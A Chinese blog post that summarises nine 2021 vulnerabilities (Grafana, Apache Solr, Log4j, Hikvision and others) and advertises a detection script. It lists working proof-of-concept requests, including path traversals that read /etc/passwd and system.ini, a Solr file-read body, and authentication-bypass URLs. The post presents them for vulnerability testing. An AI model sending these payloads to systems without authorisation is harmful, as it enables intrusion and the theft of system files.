2021年已进入到尾声,出现的漏洞五花八门,令人眼花缭乱,其中确实有很多值得思考和学习,所以今天总结出9个比较有代表性、危害范围比较广泛的漏洞进行介绍,以及使用脚本进行检测
grafana任意文件读取漏洞
漏洞原理啥的就不再赘述,直接上测试过程以及脚本的检测方式,目前脚本检测仅支持单独检测
poc:
/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd
页面原型:
漏洞利用:
脚本检测方式:
- 运行low.exe脚本,页面如下:
- 选择代号1, 数字1-9分别对应想要检测的漏洞,此处选择1
- 输入想要测试的url,请注意需要提供完整的url地址或者是https://ip:port
https://127.0.0.1:8888 不要在端口号后加反斜杠
Apache Druid任意文件读取漏洞检测
参考链接:
https://blog.csdn.net/weixin_48421613/article/details/121669590.
使用脚本检测:
Apache ShenYu身份验证绕过漏洞检测
poc:
/dashboardUser
页面原型:
漏洞检测:
工具检测:
Apache Log4j远程代码执行漏洞
参考链接:
https://mp.weixin.qq.com/s/yPEMotN8HWRptM0-Cm8t7w
脚本检测:
dnslog平台又不太好使了,这个脚本仅能测试记录header头信息的站点,详情请关注上一篇文章
D-Link DCS 信息泄露漏洞检测
poc:
/config/getuser?index=0
页面原型:
漏洞检测:
脚本检测:
Apache Solr 存在任意文件读取检测
页面原型:
poc:
/solr/admin/cores?indexInfo=false&wt=json
以get方式访问此链接,获取name值
/solr/name值/debug/dump?param=ContentStreams
以post方式访问此链接,body如下
stream.url=file:///etc/hosts
访问 地址获取name值
/solr/admin/cores?indexInfo=false&wt=json
而后以post方式访问漏洞地址,由于部分用户无权限访问etc/passwd,所以为了测试的准确性,仅访问 etc/hosts文件
使用脚本进行检测:
MessageSolution 邮件归档系统认证绕过漏洞
poc:
/authenticationserverservlet/
页面原型:
漏洞检测:
脚本检测:
海康威视任意文件读取漏洞
poc:
/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini
页面原型:
漏洞检测:
工具检测:
Kyan 网络监控设备 信息泄露漏洞
poc:
/hosts
页面原型:
漏洞检测:
脚本检测:
脚本获取方式,
https://github.com/Ilovewomen/db_script_v1-/releases/tag/v1.0
或公众号回复
请关注公众号
db_script_v1